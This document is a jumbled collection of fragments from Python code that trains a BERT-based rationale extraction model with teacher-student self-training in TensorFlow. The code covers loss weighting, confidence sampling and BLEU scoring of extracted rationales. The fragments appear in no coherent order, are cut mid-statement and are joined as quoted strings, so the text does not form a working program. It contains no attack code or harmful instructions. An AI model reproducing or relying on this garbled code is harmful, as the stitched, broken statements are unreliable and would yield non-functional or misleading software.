loss_weights=loss_weights) if counter ==", "r_acc = out[3], out[4], out[5] elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0],", "model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info", "i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(),", "epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #,", "None, None, None if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val", "logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc", "'_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5] with", "of devices: {}'.format(gpus)) #run the base model n times with different initialization to", "[] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0))", "= model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred =", "r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape))", "task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev,", "* (epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler,", "logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task):", "task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if 'mtl' in type_:", "max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_", "score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred = y_pred", "[y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]])", "temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 +=", "#y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1)", "y_T = None, None, None if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample,", "'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask':", "batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))])", "= {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]},", "= os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file", "[y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc >", "= {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc =", "temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p))", "X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as input", "type_: out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val =", "out[3], out[4], out[5] logger.info (\"Test token acc for run {} : {}\".format(counter, test_acc))", "import json import nltk import tensorflow as tf import tensorflow.keras as K import", "{}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run {} with total loss", "os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file)) break", "model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_: out", "for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if 'mtl' in", "metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if 'focal'", "if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev,", "np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices],", "{}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc =", "in type_: if 'pruthi_' in type_: out = y_train acc, y_pred, r_acc =", "= {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X,", "verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev =", "[1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs,", "rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data =", "#logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss", "0.0, 0.0, 0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0,", "X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"])))", "type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0]", "None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with", "= {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or", "0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "{\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:]", "class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run", "acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch,", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights =", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc", "= task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0],", "{}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing", "X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev =", "rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:],", "in type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights", "token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro')))", "y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student = model", "y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred =", "labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0],", "== 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split())", "#X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] '''", "np.inf for counter in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in type_:", "epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev,", "kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance':", "= np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask", "for i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch", "out[3], out[4], out[5] elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0],", "model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train,", "in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in", "\"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch =", "ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r", "dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_", "logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\")", ": y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev,", "\".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3", "= [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text']", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support", "'_noexp' in type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in type_:", "{}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to", "y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss',", "pred, truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction", "((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0", "sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25,", "{}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'],", "X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:],", "range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss = None if", "for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5]))", "'.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word in temp_t: ct+=1 temp_t.remove(word)", "in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_:", "import tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss", "max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] =", "0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j])", "= np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from", "np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r if", "y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test =", "elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task)", "= np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc", "\"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\":", "in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss = None", "model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher model): {}", "= y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for run {}:", "{\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint'", "'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy (task) across all self-training", "1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler", "X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices],", "y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled", "type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)):", "batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg'", "acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out =", "from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5,", ": {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0]", "patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation", "model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus,", "y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at", "out[4], out[5] elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))])", "verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev,", "= [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on", "logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val", "= 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as input for", "acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in type_: out", "+= test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t))", "axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled,", "\"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file", "np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc", "{} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss =", "\"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\":", "y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0],", "tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70,", "'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\":", "average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing", "None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_", "\"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev", "0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0 for i", "X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels))", "elif 'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size],", "= out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher", "= int(os.getenv(\"PYTHONHASHSEED\")) 